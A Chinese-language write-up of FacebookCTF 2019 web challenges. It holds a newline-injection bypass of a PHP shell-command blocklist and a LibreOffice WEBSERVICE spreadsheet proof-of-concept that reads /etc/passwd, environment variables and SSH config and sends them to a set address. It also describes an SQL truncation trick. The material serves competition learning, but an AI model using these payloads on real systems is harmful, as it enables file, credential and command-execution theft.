FacebookCTF2019 web writeup

facebookCTF2019

rceservice - 繞過preg_match

http://challenges.fbctf.com:8085

We created this web interface to run commands on our servers, but since we haven't figured out how to secure it yet we only let you run 'ls'

http://challenges.fbctf.com:8085

(This problem does not require any brute force or scanning. 
We will ban your team if we detect brute force or scanning).

Web Adminstration Interface

Enter command as JSON:

比賽時候沒有做出來，復現一下，根據wp，發現它接受JSON格式的命令，不過應該是過濾了很多東西

輸入：

{“cmd”:“ls”}

Attempting to run command:
index.php

輸入各種都會

Hacking attempt detected，最後過濾規則爲：

} elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
}

最後就成了如何繞過preg_match

繞過preg_match的最常用方法之一是使用多行輸入，因爲preg_match僅嘗試匹配第一行。

例如：

{
    "cmd": "ls /home/rceservice"
}

由於沒有檢查來過濾多行輸入，我們可以將這個確切的輸入發送到服務器並收到一個歡迎的響應：

注意在輸入的時候要{%0a"cmd":“ls /home/rceservice”%0a},最後在cat flag的時候發現沒有cat命令，WP中說是應用程序的PATH變量更改了

putenv('PATH=/home/rceservice/jail');

getflag:

http://challenges.fbctf.com:8085/?cmd={%0a%22cmd%22:%20%22/bin/cat%20/home/rceservice/flag%22%0a}

事實證明，多線JSON漏洞並不是Facebook團隊的預期解決方案。預期的解決方案涉及利用pcre的回溯和遞歸限制。如果達到此限制，preg_match可能會返回錯誤的匹配結果。

secret note keeper

Find the secret note that contains the fl4g!

http://challenges.fbctf.com:8082

Same thing but in tokyo: http://challenges3.fbctf.com:8082/

(Timeout is 5 seconds for links, flag is case insensitive)

這裏利用了CVE-2018-6871

https://www.exploit-db.com/exploits/44022

LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure

https://github.com/jollheef/libreoffice-remote-arbitrary-file-disclosure

從這個github上下載poc.fods

    <table:table-row table:style-name="ro2">
     <table:table-cell/>
     <table:table-cell office:value-type="string" calcext:value-type="string">
      <text:p>Current user:</text:p>
     </table:table-cell>
     <table:table-cell table:style-name="ce1" table:formula="of:=&quot;/home/&quot; &amp; MID(COM.MICROSOFT.WEBSERVICE(&quot;/proc/self/environ&quot;); FIND(&quot;USER=&quot;; COM.MICROSOFT.WEBSERVICE(&quot;/proc/self/environ&quot;)) + LEN(&quot;USER=&quot;); SEARCH(CHAR(0); COM.MICROSOFT.WEBSERVICE(&quot;/proc/self/environ&quot;); FIND(&quot;USER=&quot;; COM.MICROSOFT.WEBSERVICE(&quot;/proc/self/environ&quot;)))-FIND(&quot;USER=&quot;; COM.MICROSOFT.WEBSERVICE(&quot;/proc/self/environ&quot;))-LEN(&quot;USER=&quot;)) &amp; &quot;/&quot;" office:value-type="string" office:string-value="" calcext:value-type="error">
       <text:p>#VALUE!</text:p>
     </table:table-cell>
     <table:table-cell table:style-name="ce2" table:formula="of:=FIND(&quot;:&quot;; [.F3]; [.E3])" office:value-type="float" office:value="689" calcext:value-type="float">
      <text:p>689</text:p>
     </table:table-cell>
     <table:table-cell table:style-name="ce2" table:formula="of:=FIND(&quot;/home&quot;; [.F3]; FIND(&quot;:x:1000:1000:&quot;; [.F3]))" office:value-type="float" office:value="676" calcext:value-type="float">
      <text:p>676</text:p>
     </table:table-cell>
     <table:table-cell table:style-name="ce2" table:formula="of:=COM.MICROSOFT.WEBSERVICE(&quot;/etc/passwd&quot;)" office:value-type="string" office:string-value="" calcext:value-type="string">
       <text:p>#VALUE!</text:p>
     </table:table-cell>
     <table:table-cell/>
     <table:table-cell table:style-name="ce5" office:value-type="string" calcext:value-type="string"><text:p>(change this)</text:p><text:p>Address:</text:p>
     </table:table-cell>
     <table:table-cell table:style-name="ce5" office:value-type="string" calcext:value-type="string">
      <text:p>http://localhost:8080</text:p>
     </table:table-cell>
    </table:table-row>
    <table:table-row table:style-name="ro3">
     <table:table-cell/>
     <table:table-cell office:value-type="string" calcext:value-type="string">
      <text:p>List of private keys:</text:p>
     </table:table-cell>
     <table:table-cell table:style-name="ce1"/>
     <table:table-cell table:number-columns-repeated="2"/>
     <table:table-cell table:formula="of:=SUBSTITUTE(COM.MICROSOFT.WEBSERVICE([.C3] &amp; &quot;/.ssh/config&quot;); &quot;~&quot;; [.C3])" office:value-type="string" office:string-value="" calcext:value-type="error">
       <text:p>#VALUE!</text:p>
     </table:table-cell>
     <table:table-cell/>
     <table:table-cell office:value-type="string" calcext:value-type="string">
      <text:p>Send:</text:p>
     </table:table-cell>
     <table:table-cell/>

將/etc/passwd修改爲/home/libreoffice_admin/flag上傳即可

fb{wh0_7h0u6h7_l1br30ff1c3_c4n_b3_u53ful}

products manager

使用facebook + ' '*56 + hack了名稱，not_so_secret祕密和hacked!!!描述，併成功插入產品。我現在可以使用facebook和查看產品not_so_secret並獲得標誌。基本上，SQL忽略長度爲64之後的所有字符，默認情況下會截斷空格。

easter egg

After searching fb{ on all pages, found nothing

But searching for { found something interesting on careers page:

<p>Facebook's Application Security team<span style="color:white">{</span>is seeking a passionate hacker to help us secure over 2 billion users....

And searching for }:

<p>The Oculus Security Engineering team designs, builds, and supports the infrastructure and services<span style="color:white">}</span>that allow Oculus to move fast,...

Also found <span style="color:white">f, <span style="color:white">b etc…

import re
text = open("careers",'r').read()
text = re.findall('''<span style="color:white">.</span>''',text)
print ''.join([t[26:-7] for t in text])
fb{we're_hiring}

events

python 模板注入

https://ramadistra.dev/fbctf-2019-events

secret note keeper

pgsql注入

異步注入

https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md